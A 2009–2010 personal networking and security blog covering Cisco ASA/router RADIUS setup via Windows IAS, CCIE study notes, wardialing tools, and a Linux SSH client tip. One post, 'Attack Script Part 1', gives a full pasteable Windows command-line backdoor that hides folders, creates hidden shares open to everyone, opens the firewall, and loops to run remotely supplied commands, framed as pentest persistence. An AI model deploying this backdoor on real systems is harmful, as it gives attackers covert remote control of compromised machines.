Wednesday, December 8, 2010

Lightning Tip Gnome Connection Manager

I typically find that most Cisco admins run Windows or Mac. I am partial to Linux I love the stability but I never found anything that could compete with SecureCrt on Windows or Mac computers. I recently found Gnome Connection Manager which is very comparable to SecureCrt plus it's free! Gnome Connection Manager supports telnet, ssh, tabs and will automatically enter usernames and passwords. This is a very powerful addition for Cisco Admins who run Linux. Check out gnome connection manager and give Linux a try I'm sure you will like it.

Monday, November 29, 2010

Lightning TIP Viewing Traffic as it Crosses a Router

Do you have a need to see the packets crossing your router? If you do then you can use the debug ip packet detail command to see this traffic. The problem is it's typically so much traffic it's not useful.This is where an access list can help.

access-list 101 permit ip host host
access-list 101 permit ip host host

Now reuse the earlier debug with the access-list.

Router#debug ip packet detail 101

If you tweak your logging settings just right you should be able to capture the packet detail to syslog or to the console in real time giving you insight into the specific traffic you might be looking for.

Back in Black

Hello everyone. I have returned ! I will be writing more often about topics in tech that interest me. This blog won't have the specific focus of Information Security or Cisco like it has in the past. It will be loosely based on Technology, Information Security, Hacking and whatever else I feel like writing about. If you are reading this Thanks for your support.

Tuesday, July 28, 2009

Auth Proxy without a Cisco ACS server on an ASA

Does your organization have Active Directory? Do you have a Cisco Router or ASA? You can do authorization proxy or cut-through proxy to your Active Directory without having an ACS server. How? I will show you.

You will need at least one windows server and a Cisco ASA or Router.
First we will go to the Windows Server. This server must be part of your Active Directory and be preferably Windows Server 2003 or later

Installing IAS server
  1. Log in as an Administrator
  2. Go to Start > Control Panel > Add or Remove Progams
  3. Click Add/Remove Windows Components
  4. Scroll through the list and Click Networking Services
  5. Click Details
  6. Check the box next to Internet Authentication Service
  7. Click OK
  8. Then Next and Finish
The system may ask you to insert your Windows Server 2003 CD, so have it handy. To verify that it is installed Go to Start > Administrative Tools > Internet Authentication Service.

Configuring IAS for AD

Now we want to configure our IAS server to allow radius authentication of the Active Directory Group we are going to create. To do this we need to complete the following steps.

  1. Go to Start > Administrative Tools > Internet Authentication Service
  2. Right Click on the Internet Authentication Service in the top left of the Window
  3. Choose Register Server In Active Directory
  4. Choose OK on the First Message that allows the Server to read the dial in permission on the users from AD
  5. Choose OK on the Message that follows the first message.

Add your device to the IAS Server

We now want to add the Router/ASA to the IAS Server. To add it we do the following.
  1. Right click on the Radius Clients Folder
  2. Choose New Radius Client
  3. Enter the Friendly Name and the IP address or FQDN Click Next
  4. Leave the Default RADIUS Standard in Client Vendor Enter the Shared Secret Confirm it and choose Finish
You should now see a Device in the Right Pane of the Window

Edit your Remote Access Policy
We now want to add a Remote Access Policy that will give our group permission to authenticate to our devices. To do this we add a remote access policy.
  1. In the Internet Authentication Service window, click Remote Access Policies in the left pane.
  2. In the right pane, right-click the default policy, and select Delete.
  3. Right Click on Remote Access Policy
  4. Choose New Remote Access Policy
  5. Choose Next
  6. Click Set Up A Custom Policy, name it Cisco-Auth
  7. In the Policy Conditions Window Section add your Windows Group from Active Directory
  8. Choose Next
  9. Choose Grant Remote Access Permission
  10. Choose the Edit Profile Button
  11. Choose the Authentication Tab uncheck all options then check Unencrypted Authentication
  12. Click the Advanced Tab
  13. Remove the Framed-Protocol Radius Standard PPP
  14. Choose Service-Type Radius Standard Framed entry click edit
  15. Change the Attribute Value to Login click Ok
  16. Click Add Click Vendor Specific Click Add choose Cisco, then Yes it Conforms and Configure Attribute
  17. Add the string shell:priv-lvl=15 or change the number to whatever privilege level you want your users to be.
  18. Click ok and ok and ok and close.

AAA Radius Authentication setup
Ok thats enough windows so lets get going on our ASA with the following commands
  1. ASA(config)#aaa-server RADIUS protocol radius
  2. ASA(config)#aaa-server RADIUS (inside) host IPofyourhost password
  3. ASA(config-aaa-server-host)authentication-port 1812
  4. ASA(config-aaa-server-host)authentication-port 1813
Then you want to test your AAA setup
ASA#test aaa-server authentication RADIUS username yourusername password yourpassword

It will then ask you for a host IP if everything is setup correctly you will get
INFO: Authentication Successful

Setup Cut Through Proxy

First we create an acl to define what we want to be authenticated.

ASA(config)#access-list cut-through permit ip any eq 80

ASA(config)#access-list cut-through permit ip any eq 443

Then we configure the authentication
ASA(config)#aaa authentication match cut-through inside RADIUS

So thats it! We just saved our company some money by not needing a Cisco ACS for Auth-Proxy/cut-through proxy. We still don't get the advanced features of the ACS but we do get a free Authentication Server. If you want to do this same thing on a router just use something like this.

aaa new-model
radius-server host auth-port 1812 acct-port 1813 key
aaa authorization auth-proxy default group RADIUS
ip http server
ip auth-proxy name security http inactivity-time 60
interface f0/0
ip auth-proxy security

You can use the Radius Server we just created for login authentication as well but make sure you are using a crypto IOS and SSH or you expose your windows passwords over telnet which weakens the Windows domains already encrypted infrastructure.

Thursday, July 23, 2009

CCIE Security July 23rd 2009

Alright I am adopting the mantra of “It doesn’t matter how slow you go it only matters if you stop” I have been banging on the CCIE Security since the beginning of the year and I am starting to get to a point where I feel there isn’t a ton of study material available. The material I have from IPEXPERT is first rate but I am beginning to think I picked a real bad time to start studying for a CCIE in Security. I haven’t been exposed to the lull in material after a blueprint change in any other type of certification I have pursued.

I have on the other hand done some of the new labs from IPExpert they are of much better quality than that of the previous ones. I have been working on LAB1A all this week and I think I learned quite a few things about the ASA especially MPF. It’s really cool that you can change HTTP headers for webservers using MPF. You can make your server header say anything you want like the following.

policy-map type inspect http MAP_HTTP
spoof-server “This Server runs on Caffeine!”

I know that if I keep going on my path to CCIE I will get there! I am sure in a few more months more study materials will appear but it just seems like they are extremely sparse right now. I guess that the number of CCIE in Security is such a low number that it might be hard to get study material written. The R&S CCIE won't be like this I am sure.

Friday, March 13, 2009

Attack Script Part 1

First off let me say that I am going to start posting shorter blogs more frequently. I guess I have been kind of inspired by twitter. Instead of one giant post every month I am going to try to post several smaller posts. I am also going to be using this blog as a sounding board for my upcoming CCIE Security Lab studies. I am going to write down what I encounter and see if anything strikes any readers out their on the net.

We are going to create a back door that we can use over windows file sharing. It will allow you to run any command and have it's output exported into a file. This is an add on to Ed Skodus's for loop that allows this to happen.

So let's say we have popped a shell out of a windows box. Ok pentest is over right? Wrong! we need to use this box as a pivot point to try to go deeper into the network. So what can we do to keep access to this system without introducing any new software into the system?

We start with creating a couple of folders. We want to create these folders in a somewhat inconspicuous location. I usually choose C:\windows\system. So the commands to do this are

mkdir C:\windows\system\input
mkdir C:\windows\system\output

Next we want to hide the two folders. We want to make these folders hidden and system folders. That requires them to unhide both hidden files and protected operating system files to see the folders. To do this we use the following commands.

attrib C:\windows\system\input +H +S
attrib C:\windows\system\output +H +S

Now we want to share the two folders. To do this we use the net share command but we want to share these files with a dollar sign at the end to make sure they aren't visible on the network.

net share input$=c:\windows\system\input
net share output$=c:\windows\system\output

Now the next step is up to you and your rules of engagement . What we want to do is control access to these shares. The easiest way is to give the folders the everyone permission but this might introduce new vulnerabilities into the system. It might be prudent to create a new user on the system and then give that user permission to these folders. It's up to you but for the sake of the example we will use the everyone permission.

echo Y| cacls c:\windows\system\input /P everyone:F
echo Y| cacls c:\windows\system\output /P everyone:F

Next we turn on simple file sharing to make windows share these files the way we want it to. We do this with some netsh fu.

netsh firewall set service type = FILEANDPRINT mode = ENABLE

We now want to dump a command in our commands.txt file. This will be what we echo into to run commands through the backdoor. We want to dump a sample command to this file to make sure our loop is successful. The command is:

echo ipconfig /all > c:\windows\system\input\commands.txt

Now we finally set our loop in motion. This loop takes the commands from commands.txt runs them and then dumps the output to output.txt. The loop looks like the following.

for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output\output.txt & del c:\windows\system\input\commands.txt) & ping -n 2

I know this looks like someone threw up on your command line. It works though!! What it does is looks for the commands.txt file. It then reads the file runs the command in the file and deletes the file. It then dumps the output to the output.txt file. It does this every two seconds. So what we have is the following script that can be pasted into a shell.

'make them

mkdir c:\windows\system\input

mkdir c:\windows\system\output

'hide them

attrib c:\windows\system\input +H +S

attrib c:\windows\system\output +H

'share them

net share input$=c:\windows\system\input

net share output$=c:\windows\system\output

'allow everyone into them
echo Y| cacls c:\windows\system\input /P everyone:F

echo Y| cacls c:\windows\system\output /P everyone:F

'enable simple filesharing

netsh firewall set service type = FILEANDPRINT mode = ENABLE

'dump a sample command into commands.txt

echo ipconfig /all > c:\windows\system\input\commands.txt

'Use Ed Skodus's for /L loop

for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output & del c:\windows\system\input\commands.txt) & ping -n 2

So you can now copy out the above text and paste it into your shell. If you want to make this a batch file make sure that you change all of the % symbols in the loop to %% then it will work as a batch file.

To make sure it's working after you start the loop use the following command.

type \\(ip-address)\output$\output.txt

You should see the output of ipconfig /all on the screen.

To run a new command we use the following:

echo (command) > \\(ip-address)\input$\commands.txt

Ok so that's it a quick simple and dirty windows command line backdoor.

In the next post I will write a script that uses WMI to copy over any payload you want and the run it. You can use runas command and run the script as a user that you have already compromised. You can then turn the above script into a batch file and run it without having to pop a shell on the machine.

Saturday, March 7, 2009

The Return of Wardialing

Wardialing is kind of a lost art in the hacking community. Some of us used THC-SCAN or ToneLoc back in the day to dial out as many prefixes as possible trying to find a low security backdoor into systems. With the inception of VOIP this skillset has come back into play and is a really valid skill for penetration testers. You would be shocked at how many organizations still use dial in for systems administration. I have seen routers with modems directly connected to console cables and tons of embedded devices with modems still hanging off of them. In this post I will show you how to Wardial with two different tools.

The first tool was a paid commercial tool but is now a free tool. This tool is SecureLogix TeleSweep. It requires SOUL SUCKING REGISTRATION but it's a good free Windows War dialer. If you don't want to register our second tool is an Open Source tool so just read on.

First you need to download SecureLogix Telesweep. You can register and download the tool here

Once you have downloaded the application you can unzip and install it. This installs just like any other windows application and shouldn't be a problem for anyone familiar with windows. The next step is to execute the dialer configuration tool. Telesweep is a distributed application so it allows you to have several dialers report back to one manager. Walk through the wizard and setup your modem and enter the license that was sent in the email from securelogix. Make sure your modem is recognized by scanning for it.

The next step is to open the Telesweep secure management server and license it. Then it will open a profile and show you computers that are attached to the management server. This allows you to connect several machines and then run them all against a prefix.

Once open you can double click on the sample profile. This will show you some of the power of this tool. You can dial numbers you can also give it a list of usernames and passwords to try against a target once it has detected a carrier. So this tool will dial try to automatically penetrate and then give a report of what it has done.

All in all this is a great tool for stand alone war dialing but in combination with the next tool we are going to discuss it becomes even better for targeted attacking because of it's penetration ability.

The next tool we are going to talk about is a new one from the venerable H D Moore. Anyone who doesn't know who H D is probably shouldn't be reading this blog. H D is a personal hero of mine and has built the absolute best open source exploitation tool Metasploit. His new tool is called WarVox. WarVox allows you to leverage VOIP providers to execute your wardialing attack and then it records it's results in sound files. It's a new spin on wardialing but
allows you to have great speed.

So let's install WarVox. You need linux for WarVox I will be doing the install on BackTrack 4 but you can also use Ubuntu. I will be using the svn version if you prefer to use a stable tar file they are available for download.

  1. Open a command line in your Linux Distribution and type in

    sudo apt-get install build-essential libiaxclient-dev sox lame ruby rake rubygems libsqlite3-ruby gnuplot

    This will take care of all of the dependancies needed for WarVox.

  2. Next we want to install mongrel to improve the speed of WarVox. Use the following command to do this

    gem install mongrel

  3. Next we want to download warvox so we use:

    svn co

  4. We probably want to rename the directory to something more descriptive after downloading it. I renamed it to WarVox by using the following:

    mv trunk WarVox

  5. Next we enter into the WarVox directory and type make

  6. If everything makes correctly you will be greated with the following text:

  7. Finally we start WarVox with the following:


  8. Then we browse to if everything worked out we will be greeted by a username and password. The default username is admin and the password is warvox. You can change these by editing the warvox.conf file. Then we get a nice web interface:

After the installation of the program you can set it up with a service provider and begin Wardialing. The beauty of this program is it's speed and ability to fingerprint a line such as a fax, voice etc. If you use these two programs I have shown in combination it will give very good wardialing results in a very short period of time. Use WarVox first then put the results into Telesweep for further drilling down your targets. Both of these tools together can give a very lucrative WarDailing experience. In a world of VOIP wardialing should be a part of every VOIP penetration test.